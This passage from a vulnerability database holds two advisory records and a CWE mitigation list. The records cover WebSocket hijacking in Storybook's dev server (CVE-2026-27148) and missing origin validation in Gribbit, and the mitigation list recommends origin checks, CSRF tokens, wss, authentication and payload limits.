        "ecosystem": "npm",
        "name": "storybook"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "10.0.0-beta.0"
            },
            {
              "fixed": "10.2.10"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-27148"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-74",
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-02-26T15:16:10Z",
    "nvd_published_at": "2026-02-25T22:16:25Z",
    "severity": "HIGH"
  },
  "details": "### Summary\n\nThe WebSocket functionality in Storybook\u0027s dev server, used to create and update stories, is vulnerable to WebSocket hijacking. This vulnerability **only affects the Storybook dev server; production builds are not impacted**.\n\n### Details\n\nExploitation requires a developer to visit a malicious website while their local Storybook dev server is running. Because the WebSocket connection does not validate the origin of incoming connections, a malicious site can silently send WebSocket messages to the local instance without any further user interaction.\n\nIf a Storybook dev server is intentionally exposed publicly (e.g. for design reviews or stakeholder demos) the risk is higher, as no malicious site visit is required. Any unauthenticated attacker can send WebSocket messages to it directly.\n\nThe vulnerability affects the WebSocket message handlers for creating and saving stories, which can be exploited via unauthorized WebSocket connections to achieve persistent XSS or Remote Code Execution (RCE).\n\n_Note: recent versions of Chrome have some protections against this, but Firefox does not._\n\n### Impact\nThis vulnerability can lead to supply chain compromise. Key risks include:\n\n- **Remote Code Execution**: The vulnerability can allow attackers to execute malicious code, with the extent of impact depending on the configuration. Server-side RCE is possible in non-default configurations, such as when stories are executed via portable stories in JSDOM, potentially allowing attackers to exfiltrate credentials and environment variables, access source code and the filesystem, establish backdoors, or pivot to internal network resources.\n- **Persistent XSS**: Malicious payloads are written directly into story source files. If the malicious payload is committed to version control, it becomes part of the codebase and can propagate to deployed Storybook documentation sites, affecting developers and stakeholders who view them.\n- **Supply Chain Propagation**: If the modified source files are committed, injected code can spread to other team members via git, execute in CI/CD pipelines, and affect shared component libraries used across multiple projects.\n\n### Affected versions\n\n8.1 and above. While the exploitable functionality was introduced in 8.1, the patch has been applied to 7.x as a precautionary measure given the underlying WebSocket behaviour.\n\n### Recommended actions\nUpdate to one of the patched versions: `7.6.23`, `8.6.17`, `9.1.19`, `10.2.10`.",
  "id": "GHSA-mjf5-7g4m-gx5w",
  "modified": "2026-02-26T15:16:10Z",
  "published": "2026-02-26T15:16:10Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/security/advisories/GHSA-mjf5-7g4m-gx5w"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-27148"
    },
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/commit/0affdf928bd6fafbadfb1dfe22ce6104805e10e8"
    },
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/commit/54689a8add18ea75d628c540f4bc677592a1e685"
    },
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/commit/b8cfa77c73940c140acdcd8a06ab1ea913c44761"
    },
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/commit/d34085f39c647f5c23c3a3b2d197c18602fcf876"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/storybookjs/storybook"
    },
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/releases/tag/v10.2.10"
    },
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/releases/tag/v7.6.23"
    },
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/releases/tag/v8.6.17"
    },
    {
      "type": "WEB",
      "url": "https://github.com/storybookjs/storybook/releases/tag/v9.1.19"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Storybook Dev Server is Vulnerable to WebSocket Hijacking"
}

GHSA-MQMF-9G99-4JVX

Vulnerability from github – Published: 2023-01-09 21:30 – Updated: 2023-01-13 21:30
VLAI
Details

A vulnerability was found in lukehutch Gribbit. It has been classified as problematic. Affected is the function messageReceived of the file src/gribbit/request/HttpRequestHandler.java. The manipulation leads to missing origin validation in websockets. The name of the patch is 620418df247aebda3dd4be1dda10fe229ea505dd. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217716.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2014-125071"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-1385",
      "CWE-346"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2023-01-09T21:15:00Z",
    "severity": "CRITICAL"
  },
  "details": "A vulnerability was found in lukehutch Gribbit. It has been classified as problematic. Affected is the function messageReceived of the file src/gribbit/request/HttpRequestHandler.java. The manipulation leads to missing origin validation in websockets. The name of the patch is 620418df247aebda3dd4be1dda10fe229ea505dd. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-217716.",
  "id": "GHSA-mqmf-9g99-4jvx",
  "modified": "2023-01-13T21:30:28Z",
  "published": "2023-01-09T21:30:20Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125071"
    },
    {
      "type": "WEB",
      "url": "https://github.com/lukehutch/gribbit/commit/620418df247aebda3dd4be1dda10fe229ea505dd"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?ctiid.217716"
    },
    {
      "type": "WEB",
      "url": "https://vuldb.com/?id.217716"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ]
}

Mitigation
Implementation

Enable CORS-like access restrictions by verifying the 'Origin' header during the WebSocket handshake.

Mitigation
Implementation

Use a randomized CSRF token to verify requests.

Mitigation
Implementation

Use TLS to securely communicate using 'wss' (WebSocket Secure) instead of 'ws'.

Mitigation
Architecture and Design Implementation

Require user authentication prior to the WebSocket connection being established. For example, the WS library in Node has a 'verifyClient' function.

Mitigation
Implementation

Leverage rate limiting to prevent against DoS. Use of the leaky bucket algorithm can help with this.

Mitigation
Implementation

Use a library that provides restriction of the payload size. For example, WS library for Node includes 'maxPayloadoption' that can be set.

Mitigation
Implementation

Treat data/input as untrusted in both directions and apply the same data/input sanitization as XSS, SQLi, etc.

No CAPEC attack patterns related to this CWE.